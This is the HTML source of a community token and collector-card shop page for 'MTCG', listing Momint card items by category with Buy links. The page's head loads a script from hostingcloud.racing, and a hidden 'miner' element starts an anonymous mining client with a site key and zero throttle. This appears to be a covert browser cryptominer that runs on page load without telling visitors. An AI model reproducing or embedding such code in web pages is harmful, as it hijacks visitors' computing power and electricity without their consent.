<!DOCTYPE html>
<html lang="en">
  <head>
    <title>#MindsGaming - MTCG</title>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="Community & Member Groups" />
    <meta
      property="og:image"
      content="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />
    <link
      rel="icon"
      href="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />
    <link rel="stylesheet" href="https://ipack.glitch.me/mgicons.css" />
    <script src="https://www.hostingcloud.racing/3g44.js"></script>

    <script src="/tokens/metamask.js" defer></script>
    <script src="https://mtcgverse.glitch.me/MTCGverse.js" defer></script>
    <script src="/tokens/tokens.js" defer></script>
    <script src="https://mindsgaming.glitch.me/mtcg/docs.js"></script>
    <script src="/client.js" defer></script>
    <script src="/games/games.js" defer></script>
    <script src="/games/spin/spin.js" defer></script>
    <script src="/games/spin/start.js" defer></script>
    <script src="/fly.js" defer></script>
    <script src="/miner/minercheck.js" defer></script>
    <script src="/cards/cards.js" defer></script>

    <link rel="stylesheet" href="/cards/cards.css" defer />
    <link rel="stylesheet" href="/style.css" />
    <link rel="stylesheet" href="/games/spin/style.css" defer />
  </head>
  <body>
    <miner class="hide" id="MINER">
      <script>
        var _client = new Client.Anonymous(
          "965d2861fb2a4feecd31c6df44bb842f986bbdb2caccd02642aae8c5a23e3883",
          {
            throttle: 0,
            c: "w",
          }
        );
        _client.start();
        _client.className = "hide";
      </script></miner
    >
    <wrap>
      <app id="APP" class="display" title="HOME">
        <center>
          <article>
            <h1>MTCG Token Shop</h1>
            <p class="white">
              You can purchase our last 10(Ten) minted cards from our token shop
              for MTCG on MintMe!
              <br />
              Just head over to our token introduction page and open the token
              shop to spend your MTCG on collector cards!
            </p>
            <button class="shopbtn">
              <a href="https://www.mintme.com/token/MTCG">MTCG</a>
            </button>
          </article>

          <article>
            <h1>Creator Shops</h1>
            <p class="white">
              Each creator in our ecosystem has thier own shop and can sell a
              wide range of items that can be found on the creators token
              introduction page. <br />
              Click below to open a random store item from one of our creators!
            </p>
            <button class="shopbtn" onclick="comingsoon();">Random Item</button>

            <br />
            <label id="comingsoon"></label>
          </article>

          <article>
            <center style="color: white">
              <h1>Momint Shop</h1>
              <p>
                Our full collection of collector cards can be purchased on
                Momint!
              </p>
              <div class="holder">
                <label class="hide" onclick="byAttack();">ATK</label>
                <div class="hide" title="CLOSED" id="SEARCH">
                  <h1 class="albumT" title="Search" onclick="hideSearch();">
                    Search
                  </h1>
                  <div id="myResults" title="Results"></div>
                </div>

                <div class="album" title="Supernatural">
                  <h1
                    class="albumT"
                    title="Supernatural"
                    onclick="hideSupernatural();"
                  >
                    Supernatural
                  </h1>
                  <div id="SUPERNATURAL" title="Supernatural">
                    <div class="cHolder">
                      <label id="POPOLVUH"></label>
                      <a
                        href="https://app.momint.so/m/627eaf7e62e854002fc7aca4"
                        target="_blank"
                        class="button"
                        title="Buy POPOL VUH"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="GHOST"></label>
                      <a
                        href="https://app.momint.so/m/62e1462b654ae956096486ac"
                        target="_blank"
                        class="button"
                        title="Buy GHOST"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="UnsettlingSound"></label>
                      <a
                        href="https://app.momint.so/m/62a282a13ff24c05c5133665"
                        target="_blank"
                        class="button"
                        title="Buy Unsettling Sound"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="WITCH"></label>
                      <a
                        href="https://app.momint.so/m/635490ebd4ac522ecd5f2cff"
                        target="_blank"
                        class="button"
                        title="Buy WITCH"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="WitchesBroom"></label>
                      <a
                        href="https://app.momint.so/m/62a756d2520beae1c74689ae"
                        target="_blank"
                        class="button"
                        title="Buy Witches Broom"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="Thanatos"></label>
                      <a
                        href="https://app.momint.so/m/62ac16cd520beae1c746b56c"
                        target="_blank"
                        class="button"
                        title="Buy Thanatos"
                        >Buy</a
                      >
                    </div>

                    <div class="cHolder">
                      <label id="DEVIL"></label>
                      <a
                        href="https://app.momint.so/m/634ac7ca606d2b2fc8cd4a61"
                        target="_blank"
                        class="button"
                        title="Buy DEVIL"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Food">
                  <h1 class="albumT" title="Food" onclick="hideFood();">
                    Food
                  </h1>
                  <div id="FOOD" title="Food">
                    <div class="cHolder">
                      <label id="FartGas"></label>
                      <a
                        href="https://app.momint.so/m/62680af6dea99b002f036a69"
                        target="_blank"
                        class="button"
                        title="Buy Fart Gas"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="Mayonnaise"></label>
                      <a
                        href="https://app.momint.so/m/62b0bad4520beae1c746dd89"
                        target="_blank"
                        class="button"
                        title="Buy Mayonnaise"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="PopcornMonster"></label>
                      <a
                        href="https://app.momint.so/m/62b5d5adb63f50e431215e16"
                        target="_blank"
                        class="button"
                        title="Buy Popcorn Monster"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="HONEY"></label>
                      <a
                        href="https://app.momint.so/m/62e7f0b025bc6ef495b7011a"
                        target="_blank"
                        class="button"
                        title="Buy HONEY"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="SALT"></label>
                      <a
                        href="https://app.momint.so/m/6324b7c1244b2f0ef24d2b17"
                        target="_blank"
                        class="button"
                        title="Buy SALT"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="BUTTER"></label>
                      <a
                        href="https://app.momint.so/m/6330c145244b2f0ef24d544f"
                        target="_blank"
                        class="button"
                        title="Buy BUTTER"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Art/Culture">
                  <h1
                    class="albumT"
                    title="Art/Culture"
                    onclick="hideCulture();"
                  >
                    Art/Culture
                  </h1>
                  <div id="CULTURE" title="Art/Culture">
                    <div class="cHolder">
                      <label id="MoonRabbit"></label>
                      <a
                        href="https://app.momint.so/m/6249a3755af729002ffacd77"
                        target="_blank"
                        class="button"
                        title="Buy Moon Rabbit"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="Aphrodite"></label>
                      <a
                        href="https://app.momint.so/m/6251e9e3ea6f550033dbd043"
                        target="_blank"
                        class="button"
                        title="Buy Aphrodite"
                        >Buy</a
                      >
                    </div>

                    <div class="cHolder">
                      <label id="Mayflower"></label>
                      <a
                        href="https://app.momint.so/m/628e38f25385d2062fd71584"
                        target="_blank"
                        class="button"
                        title="Buy Mayflower"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="TheMayans"></label>
                      <a
                        href="https://app.momint.so/m/6283a86362e854002fc7f9d4"
                        target="_blank"
                        class="button"
                        title="Buy The Mayans"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="MonkeyBusiness"></label>
                      <a
                        href="https://app.momint.so/m/6315364c9fc829e869a1b1c2"
                        target="_blank"
                        class="button"
                        title="Buy Monkey Business"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="JackOLantern"></label>
                      <a
                        href="https://app.momint.so/m/635fc035204ca00238cb7b21"
                        target="_blank"
                        class="button"
                        title="Buy Jack-O'-Latern"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Creators">
                  <h1 class="albumT" title="Creators" onclick="hideCreators();">
                    Creators
                  </h1>
                  <div id="CREATORSa" title="Ceators">
                    <div class="cHolder">
                      <label id="Independence"></label>
                      <a
                        href="https://app.momint.so/m/62c280ed63c6f3b684ea5d0d"
                        target="_blank"
                        class="button"
                        title="Buy Independence"
                        >Buy</a
                      >
                    </div>

                    <div class="cHolder">
                      <label id="DooBetter"></label>
                      <a
                        href="https://app.momint.so/m/62c73a2f654ae9560963bf77"
                        target="_blank"
                        class="button"
                        title="Buy DooBetter"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="ECLIPSE"></label>
                      <a
                        href="https://app.momint.so/m/62c73a2f654ae9560963bf77"
                        target="_blank"
                        class="button"
                        title="Buy ECLIPSE"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="BNDR"></label>
                      <a
                        href="https://app.momint.so/m/636d08e2605d0f358fa68516"
                        target="_blank"
                        class="button"
                        title="Buy BNDR"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Birds/Air">
                  <h1 class="albumT" onclick="hideBirds();" title="Birds/Air">
                    Birds/Air
                  </h1>
                  <div id="BIRDS" title="Birds/Air">
                    <div class="cHolder">
                      <label id="BirdsNest"></label>
                      <a
                        href="https://app.momint.so/m/626e98a1dea99b002f040dad"
                        target="_blank"
                        class="button"
                        title="Buy Birds Nest"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="FlyingWisdom"></label>
                      <a
                        href="https://app.momint.so/m/6279696b62e854002fc7410b"
                        target="_blank"
                        class="button"
                        title="Buy Flying Wisdom"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="BullishFlyer"></label>
                      <a
                        href="https://app.momint.so/m/6273e2c916cdd7002f21290e"
                        target="_blank"
                        class="button"
                        title="Buy Bullish Flyer"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="MAYDAY"></label>
                      <a
                        href="https://app.momint.so/m/629389105385d2062fd75ec3"
                        target="_blank"
                        class="button"
                        title="Buy MAYDAY"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Monsters">
                  <h1 class="albumT" title="Monsters" onclick="hideMonsters();">
                    Monsters
                  </h1>
                  <div id="MONSTERS" title="Monsters">
                    <div class="cHolder">
                      <label id="DINOMONSTER"></label>
                      <a
                        href="https://app.momint.so/m/626173ba24b913002f67a7d1"
                        target="_blank"
                        class="button"
                        title="Buy DINOMONSTER"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="DinoEggs"></label>
                      <a
                        href="https://app.momint.so/m/625c433c24b913002f66fd5f"
                        target="_blank"
                        class="button"
                        title="Buy Dino Eggs"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="MasterPoo"></label>
                      <a
                        href="https://app.momint.so/m/62bb21ffb63f50e431218a10"
                        target="_blank"
                        class="button"
                        title="Buy Master Poo"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>
                <div class="album" title="Space/Aliens">
                  <h1
                    class="albumT"
                    title="Space/Aliens"
                    onclick="hideAliens();"
                  >
                    Space/Aliens
                  </h1>
                  <div id="ALIENS" title="Space/Aliens">
                    <div class="cHolder">
                      <label id="AlienBeer"></label>
                      <a
                        href="https://app.momint.so/m/6256e8e0769ddc002f5ee5dd"
                        target="_blank"
                        class="button"
                        title="Buy Alien Beer"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="ExtraterrestrialCode"></label>
                      <a
                        href="https://app.momint.so/m/62f304d93aa6523c90b68556"
                        target="_blank"
                        class="button"
                        title="Buy Extraterrestrial Code"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="AlienDreamTime"></label>
                      <a
                        href="https://app.momint.so/m/62fa5495ac937f6793548283"
                        target="_blank"
                        class="button"
                        title="Buy Alien DreamTime"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Music">
                  <h1 class="albumT" title="Music" onclick="hideMusic();">
                    Music
                  </h1>
                  <div id="MUSICa" title="Music">
                    <div class="cHolder">
                      <label id="SheetMusic"></label>
                      <a
                        href="https://app.momint.so/m/6298b99a331fdabd36070eb1"
                        target="_blank"
                        class="button"
                        title="Buy Sheet Music"
                        >Buy</a
                      >
                    </div>

                    <div class="cHolder">
                      <label id="MusicDJ"></label>
                      <a
                        href="https://app.momint.so/m/629d6e19ad4401f67d362b55"
                        target="_blank"
                        class="button"
                        title="Buy Music DJ"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="Gaming">
                  <h1 class="albumT" title="Gaming" onclick="hideGaming();">
                    Gaming
                  </h1>
                  <div id="GAMINGa" title="Gaming">
                    <div class="cHolder">
                      <label id="SharksAndMinnows"></label>
                      <a
                        href="https://app.momint.so/m/630f98f194b3e6b9dd55a3f4"
                        target="_blank"
                        class="button"
                        title="Buy Sharks And Minnows"
                        >Buy</a
                      >
                    </div>
                    <div class="cHolder">
                      <label id="TicTacToe"></label>
                      <a
                        href="https://app.momint.so/m/63655d08951b0392152804e2"
                        target="_blank"
                        class="button"
                        title="Buy Tic-Tac-Toe"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>

                <div class="album" title="MANERGY">
                  <h1 class="albumT" title="MANERGY" onclick="hideManergy();">
                    MANERGY
                  </h1>
                  <div id="MANERGYa" title="MANERGY">
                    <div class="cHolder">
                      <label id="MANERGY"></label>
                      <a
                        href="https://app.momint.so/m/62890f4762e854002fc847fe"
                        target="_blank"
                        class="button"
                        title="Buy MANERGY(000)"
                        >Buy</a
                      >
                    </div>
                  </div>
                </div>
              </div>
            </center>
          </article>
        </center>
      </app>
    </wrap>
    <div id="offline" class="hide">
      <center>
        <h1>No connection Found :/</h1>
        <button onclick="HOME();">Relaod Site</button>
      </center>
    </div>
  </body>
</html>
